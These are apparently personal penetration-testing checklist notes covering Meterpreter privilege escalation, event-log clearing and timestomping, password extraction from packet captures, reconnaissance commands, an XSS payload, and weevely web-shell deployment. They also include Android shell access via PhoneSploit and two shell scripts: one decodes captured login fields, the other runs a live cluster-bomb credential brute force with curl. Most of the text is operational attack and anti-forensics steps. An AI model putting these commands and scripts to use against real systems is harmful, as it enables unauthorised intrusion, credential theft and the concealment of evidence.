xtra_pins_to_pentest_checklists_20222

To be added

25 November 2022 15:35

Execute PowerShell scripts to get VNC, bypass AV detection and escalate privileges. From the Meterpreter session upload PowerUp.ps1 (local path first, then remote name): upload <path> PowerUp.ps1

powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1; Invoke-AllChecks"

Upload and run BeRoot.exe to enumerate routes to the highest privilege.

clearev (Meterpreter) clears the Windows event logs (Application, System and Security).

timestomp secret.txt -m "<new Modified value, in the same format timestomp secret.txt -v prints, i.e. MM/DD/YYYY HH24:MI:SS>"

tcpdump -nvx -i <interface> port 8888 // run this on the receiving side to monitor the traffic

To look for logged-in users' passwords in a pcap file, apply the Wireshark display filter http.request.method == "POST"

OR

Edit --> Find Packet --> search in Packet details, as a String (Narrow, UTF-8 / ASCII), for pwd; then expand HTML Form URL Encoded in the packet details to read the submitted fields.
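The same thing done from the command line, as an added example that is not part of the original notes: take the body of a captured login POST (the constructed request below stands in for what "Follow TCP Stream" or tcpdump -A shows) and URL-decode the form fields, which is what Wireshark does when you expand HTML Form URL Encoded. Field names, the host and the password are all made up.

```sh
#!/bin/sh
# Added example, not from the original notes: decode an application/x-www-form-urlencoded
# login POST the way Wireshark's "HTML Form URL Encoded" view does.
# SAMPLE_POST is constructed sample data, not a real capture.

SAMPLE_POST='POST /login.php HTTP/1.1
Host: target.example
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

username=alice&pwd=S3cr%21t%40pa%24%24&submit=Log+in'

# url_decode STRING: '+' becomes a space, %XX becomes the byte it encodes.
# Pure POSIX sh: hex -> number via $(( )), then printf with an octal escape.
url_decode() {
  s=$1
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}            # first character of the remaining string
    s=${s#?}
    case $c in
      +) printf ' ' ;;
      %) hex=${s%"${s#??}"}     # the two characters after the %
         case $hex in
           [0-9A-Fa-f][0-9A-Fa-f])
             s=${s#??}
             printf "\\$(printf '%03o' "$((0x$hex))")" ;;
           *) printf '%%' ;;    # malformed escape: keep the literal %
         esac ;;
      *) printf '%s' "$c" ;;
    esac
  done
}

# form_fields RAW_HTTP: one decoded "key=value" line per form field in the body.
form_fields() {
  printf '%s\n' "$1" | tr -d '\r' | sed -n '/^$/,$p' | sed '1d' | tr '&' '\n' |
    while IFS= read -r pair; do
      [ -n "$pair" ] || continue
      key=${pair%%=*}
      val=${pair#*=}
      printf '%s=%s\n' "$(url_decode "$key")" "$(url_decode "$val")"
    done
}

# get_field RAW_HTTP NAME: the decoded value of a single field, e.g. the password.
get_field() {
  form_fields "$1" | sed -n "s/^$2=//p"
}

# Usage: sh decode_post.sh prints the decoded fields of the sample request.
form_fields "$SAMPLE_POST"
```

Against a real capture the same result comes from tshark with the display filter above: tshark -r capture.pcap -Y 'http.request.method == "POST"' -T fields -e http.host -e http.request.uri -e urlencoded-form.key -e urlencoded-form.value. Only cleartext HTTP shows up this way; for HTTPS you need the TLS keys (SSLKEYLOGFILE) loaded in Wireshark first.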

Anti DoS Guardian can be used for DoS mitigation on the defending side.

Ghost Eye: footprinting tool

Banner grabbing:

nc -vv <host> 80

telnet <host> 80

nmap -sV --script=http-enum <domain>

nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- <domain> (other hostnames sharing the target's IP; the prefix argument writes the results to hostmap-<target> files)

Reflected XSS test payload: <script>alert(1)</script>

whatweb <domain>

nmap -T4 -A -v <domain>

After getting RCE, add a user and RDP in with the added credentials.

Directory listing:

gobuster dir -u http://<url> -w <wordlist.txt>

During a login brute force (Burp Intruder) use the Cluster bomb attack type: every username is tried against every password.

Web shell: weevely generate <password> <path.php>, upload the generated PHP file to the target, then connect with:

weevely http://<url>/<path.php> <password>
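What the Cluster bomb attack type actually sends, as an added example that is not part of the original notes: Intruder pairs every payload from set 1 with every payload from set 2, so the request count is |users| x |passwords|. The wordlists, form field names, login URL and the "Invalid" failure marker below are constructed assumptions; the pairing function is the part that runs offline, the curl loop only runs when a target URL is passed.

```sh
#!/bin/sh
# Added example, not from the original notes: reproduce Burp Intruder's "cluster bomb"
# pairing in sh and feed each pair to the login form with curl.
# USERS, PASSWORDS, the field names and the failure string are assumptions.

USERS='admin
alice
bob'
PASSWORDS='admin
password
Winter2022!'

# cluster_bomb USERS PASSWORDS: every user paired with every password, "user:pass" per line.
cluster_bomb() {
  printf '%s\n' "$1" | while IFS= read -r u; do
    printf '%s\n' "$2" | while IFS= read -r p; do
      printf '%s:%s\n' "$u" "$p"
    done
  done
}

# count_combos USERS PASSWORDS: number of requests the attack will send.
count_combos() {
  cluster_bomb "$1" "$2" | wc -l | tr -d ' '
}

# try_login URL USER PASS: POST one pair the way the form does (--data-urlencode handles
# special characters). Success = the response does NOT contain the failure string,
# which you confirm first with a single known-bad request so the check is not guessed.
try_login() {
  body=$(curl -s --data-urlencode "username=$2" --data-urlencode "password=$3" "$1")
  case $body in
    *Invalid*) return 1 ;;
    *) return 0 ;;
  esac
}

# Usage: sh cluster_bomb.sh http://target.example/login.php
# Without an argument only the pair generation runs.
if [ -n "$1" ]; then
  cluster_bomb "$USERS" "$PASSWORDS" | while IFS=: read -r u p; do
    if try_login "$1" "$u" "$p"; then
      echo "valid credentials: $u / $p"
    fi
  done
else
  echo "$(count_combos "$USERS" "$PASSWORDS") requests would be sent"
fi
```

Keep an eye on lockout policies before running the live loop: with cluster bomb the attempt count per account equals the size of the password list, which is exactly what account lockout thresholds trip on; pitchfork (set 1 line i with set 2 line i) is the type to use when you have matched credential pairs from a dump.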

Android

apt-get install adb

git clone the PhoneSploit repo, run it and choose option 3 (connect a new phone)

<type IP>, then option 4 (access a shell on the phone)

exit (to leave the shell)
